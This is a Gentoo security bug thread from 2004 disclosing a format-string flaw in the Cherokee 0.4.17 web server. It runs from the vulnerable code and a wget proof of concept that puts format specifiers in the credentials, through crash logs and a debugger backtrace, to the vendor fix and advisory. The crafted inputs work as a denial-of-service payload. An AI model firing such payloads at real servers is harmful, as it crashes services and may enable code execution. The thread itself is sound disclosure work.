Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bugzilla DB migration completed. Please report issues to Infra team via email via infra@gentoo.org or IRC
Bug 67667 - www-servers/cherokee: remote Format String Vulnerability
Summary: www-servers/cherokee: remote Format String Vulnerability
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All All
: High major (vote)
Assignee: Gentoo Security
URL: http://www.alobbs.com/cherokee
Whiteboard: B1 [glsa] jaervosz
Keywords:
Depends on:
Blocks:
 
Reported: 2004-10-15 08:02 UTC by Florian Schilhabel (RETIRED)
Modified: 2004-11-04 14:26 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Florian Schilhabel (RETIRED) gentoo-dev 2004-10-15 08:02:05 UTC
hi,
i have found a remote exploitable formatstring bug in the Webserver cherokee-0.4.17.

the affected function is located in logger_ncsa.c:

cherokee_logger_ncsa_write_string():

ret_t 
cherokee_logger_ncsa_write_string (cherokee_logger_ncsa_t *logger, const char *string)
{
	if (logger->accesslog_fd != NULL) {
		int ret;
		ret = fprintf (logger->accesslog_fd, string);

		return (ret > 0) ? ret_ok : ret_error;
	} 

	syslog (LOG_INFO, "%s", string);
	return ret_ok;
}

this function is called, if a users authenticates to the server with username plus password (via auth_pam)
in validator_pass.c:

--- snip ---
ret_t 
cherokee_validator_pam_check (cherokee_validator_pam_t  *pam, cherokee_connection_t *conn)
{
...
	/* Try to authenticate user:
	 */
	ret = _pam_dispatch (pamhandle, 0, 1);
	if (ret != PAM_SUCCESS) {
		cherokee_logger_write_string (
			CONN_VSRV(conn)->logger,
			"PAM: user '%s' - not authenticated: %s", 
			conn->user->buf, pam_strerror(pamhandle, ret));

		goto unauthorized;
	}
...
--- snip ---

demonstration:

client:
bash-2.05b$ wget --http-user=%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x --http-passwd=%n%n%x http://127.0.0.1/private/index.html
--01:12:39--  http://127.0.0.1/private/index.html
           => `index.html'
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response...
End of file while parsing headers.
Retrying.

--01:12:41--  http://127.0.0.1/private/index.html
  (try: 2) => `index.html'
Connecting to 127.0.0.1:80... failed: Connection refused.
bash-2.05b$

server:

bender root # cherokee -C /etc/cherokee/cherokee.conf
PHP interpreter not found (/usr/lib/cgi-bin/php4). Please install it.
Cherokee Web Server 0.4.17: Listening on port 80, using poll, 1024 fds limit
5 threads, 204 fds in each, standard scheduling policy, TLS disabled
Cherokee feels panic!
Killed
bender root #


server log:
you can find very interesting data in /var/log/cherokee.access:

PAM: user '(null)0ö0öPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication module0ö$ìPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication modulePAM: user '%s' - not authenticated: %s
Comment 1 Florian Schilhabel (RETIRED) gentoo-dev 2004-10-15 08:02:05 UTC
hi,
i have found a remote exploitable formatstring bug in the Webserver cherokee-0.4.17.

the affected function is located in logger_ncsa.c:

cherokee_logger_ncsa_write_string():

ret_t 
cherokee_logger_ncsa_write_string (cherokee_logger_ncsa_t *logger, const char *string)
{
	if (logger->accesslog_fd != NULL) {
		int ret;
		ret = fprintf (logger->accesslog_fd, string);

		return (ret > 0) ? ret_ok : ret_error;
	} 

	syslog (LOG_INFO, "%s", string);
	return ret_ok;
}

this function is called, if a users authenticates to the server with username plus password (via auth_pam)
in validator_pass.c:

--- snip ---
ret_t 
cherokee_validator_pam_check (cherokee_validator_pam_t  *pam, cherokee_connection_t *conn)
{
...
	/* Try to authenticate user:
	 */
	ret = _pam_dispatch (pamhandle, 0, 1);
	if (ret != PAM_SUCCESS) {
		cherokee_logger_write_string (
			CONN_VSRV(conn)->logger,
			"PAM: user '%s' - not authenticated: %s", 
			conn->user->buf, pam_strerror(pamhandle, ret));

		goto unauthorized;
	}
...
--- snip ---

demonstration:

client:
bash-2.05b$ wget --http-user=%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x --http-passwd=%n%n%x http://127.0.0.1/private/index.html
--01:12:39--  http://127.0.0.1/private/index.html
           => `index.html'
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response...
End of file while parsing headers.
Retrying.

--01:12:41--  http://127.0.0.1/private/index.html
  (try: 2) => `index.html'
Connecting to 127.0.0.1:80... failed: Connection refused.
bash-2.05b$

server:

bender root # cherokee -C /etc/cherokee/cherokee.conf
PHP interpreter not found (/usr/lib/cgi-bin/php4). Please install it.
Cherokee Web Server 0.4.17: Listening on port 80, using poll, 1024 fds limit
5 threads, 204 fds in each, standard scheduling policy, TLS disabled
Cherokee feels panic!
Killed
bender root #


server log:
you can find very interesting data in /var/log/cherokee.access:

PAM: user '(null)0ö0öPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication module0ö$ìPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication modulePAM: user '%s' - not authenticated: %s  1@ìd@$G@Û/@$G@°.@°XPAM: user '(null)0ö0öPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication module0ö$ìPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication modulePAM: user '%s' - not authenticated: %s  1@ìd@$G@Û/@$G@ °.@¨X

to be clear: the syslog() fkt is porperly protected - it happens one before...

debugger attached to server:

Attaching to program: /usr/sbin/cherokee, process 23158
Reading symbols from /usr/lib/libcherokee.so.0...done.
Loaded symbols for /usr/lib/libcherokee.so.0
Reading symbols from /lib/libpthread.so.0...done.
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 23158)]
[New Thread 32769 (LWP 23159)]
[New Thread 16386 (LWP 23160)]
[New Thread 32771 (LWP 23161)]
[New Thread 49156 (LWP 23162)]
[New Thread 65541 (LWP 23163)]
Loaded symbols for /lib/libpthread.so.0
Reading symbols from /lib/libdl.so.2...done.
Loaded symbols for /lib/libdl.so.2
Reading symbols from /lib/libc.so.6...done.

[more symbols]

Reading symbols from /usr/lib/cherokee/libcherokee_plain.so...done.
Loaded symbols for /usr/lib/cherokee/libcherokee_plain.so
0x40165a11 in loser_poll () from /lib/libc.so.6
(gdb) step
Single stepping until exit from function loser_poll,
which has no line number information.
[Switching to Thread 16384 (LWP 23158)]
0x40165aca in poll () from /lib/libc.so.6
(gdb) step
Single stepping until exit from function poll,
which has no line number information.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 65541 (LWP 23163)]
0x4011f753 in strlen () from /lib/libc.so.6
(gdb) backtrace
#0  0x4011f753 in strlen () from /lib/libc.so.6
#1  0x400f6d29 in vfprintf () from /lib/libc.so.6
#2  0x400fcfef in fprintf () from /lib/libc.so.6
#3  0x4030292d in cherokee_logger_ncsa_write_string (logger=0x3a4d4150,
    string=0x267a <Address 0x267a out of bounds>) at logger_ncsa.c:295
#4  0x4003e7c8 in cherokee_logger_write_string (logger=0x806e150,
    format=0x3a4d4150 <Address 0x3a4d4150 out of bounds>) at logger.c:156
#5  0x402fdd55 in cherokee_validator_pam_check (pam=0x807ef10, conn=0x807e780) at validator_pam.c:180
#6  0x40042eb0 in cherokee_validator_check (validator=0x0, conn=0x3a4d4150) at validator.c:63
#7  0x40039d44 in cherokee_connection_check_authentication (cnt=0x807e780, plugin_entry=0x806ef18)
    at connection.c:1296
#8  0x4003f171 in process_active_connections (thd=0x807d090) at thread.c:460
#9  0x4003fce8 in cherokee_thread_step_MULTI_THREAD (thd=0x807d090, dont_block=false) at thread.c:1096
#10 0x4003eb84 in thread_routine (data=0x807d090) at thread.c:73
#11 0x4006b01f in pthread_start_thread () from /lib/libpthread.so.0
#12 0x4016ee6a in clone () from /lib/libc.so.6
(gdb)

another impact:

client:
wget http://127.0.0.1/%s%s%s%s%s%s%s%s%s%s%s%s%s% [+x] %s

serverlog:
127.0.0.1 - - [15/Oct/2004:01:30:58 +0100] "GET /%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$G@pP]è@P`,ú¿$G@`PX¤@P`$G@Ã&#138;í@``Dú¿$G@$G@`ï@`xú¿ «@ç´´â&#150;&#146;©$G@Pçèü°ç$G@Ã&#140;û¿ë@u@;@à û¿;@à û¿°@øü¿¯@jî@à û¿ ¤@(@(@ ¤øÿ¿@µ@ ¤@â&#150;&#146;øÿ¿$G@Ã&#152;Ã&#140;P(¨@ì ¤@u@Ã&#128;Ã&#128;'Ã&#128;!ý¿a¤ý¿¬ý¿ÿ¿ªÃ&#128;@0¤@

we're basically hitting the stack here... we can do everything, send shellcde, write .dtors, etc...

Impact:
 
 -> a succesful exploitation of this bug leads to execution of arbitrary code (with server rights, of course)
-> in case of unsuccessful exploitation, this leads to a denial of service.

i think, this bug should be fixed upstream, therefore i have not attached a patch for this issue.
author has _not_ yet been informed about this bug.

best regards

florian [rootshell]
Comment 2 Thierry Carrez (RETIRED) gentoo-dev 2004-10-20 01:10:42 UTC
Audit team, please peer-review this one before we take it to upstream and/or vendor-sec.
Comment 3 Dan Margolis (RETIRED) gentoo-dev 2004-10-26 14:47:26 UTC
This is confirmed. Easy DoS, potential code execution (I'll have to spend more time on that part; I haven't managed RCE yet). 

Time to contact the Cherokee dev team and possibly forward to vendor-sec. I'm writing to them now. 

Thanks, rootshell.
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2004-10-27 01:14:50 UTC
Krispy: don't forget to credit Florian if you write directly upstream. Maybe it's best if he writes to them himself.

klieber/solar: do you think this one needs to be coordinated with vendor-sec ? Who ships cherokee ?
Comment 5 Florian Schilhabel (RETIRED) gentoo-dev 2004-10-30 07:43:34 UTC
hi,
i just got this email (as CC) from chreokee maintainer:

-- mail --

Hi Dan,

  First of all, thank you very much for the report :-)


  There are two patched versions that correct this bug:

  - The 0.4.17.1: It is the fixed 0.4.17:

    ftp://alobbs.com/cherokee/0.4/0.4.17/cherokee-0.4.17.1.tar.gz

  - The 0.4.18b25: It is a beta of the incoming release of
    Cherokee. It contains new features, but of are unfinished yet:

    http://alobbs.com/tmp/cherokee-0.4.18b25.tar.gz

-- eof --

so please bump up to version 0.4.17.1
save to go public now...

best regards

florian [rootshell]
Comment 6 Florian Schilhabel (RETIRED) gentoo-dev 2004-10-30 07:48:15 UTC
this is the debian maintainer, btw:

http://people.debian.org/~rcardenes/#cherokee

seems, that other distributions do _not_ ship cherokee by default...
(at least i cant find 'official' rpms)

best regards

florian [rootshell]
Comment 7 Sune Kloppenborg Jeppesen gentoo-dev 2004-10-30 08:35:18 UTC
Stuart please provide an updated ebuild or CC the right dev as this is not a public bug.
Comment 8 Stuart Herbert (RETIRED) gentoo-dev 2004-10-30 10:12:36 UTC
Updated ebuild committed, and marked stable on x86.  Just needs marking stable on ppc now.
Comment 9 Sune Kloppenborg Jeppesen gentoo-dev 2004-10-30 13:49:44 UTC
CC'ing pvdabeel instead of ppc as this bug is not public.

Pieter please test and mark 0.4.17.1 stable.
Comment 10 Thierry Carrez (RETIRED) gentoo-dev 2004-11-01 02:16:18 UTC
This is public now (see http://alobbs.com/)
ppc: please mark stable.
Comment 11 Michael Hanselmann (hansmi) (RETIRED) gentoo-dev 2004-11-01 02:34:22 UTC
Stable on ppc.
Comment 12 Sune Kloppenborg Jeppesen gentoo-dev 2004-11-01 10:16:43 UTC
GLSA 200411-02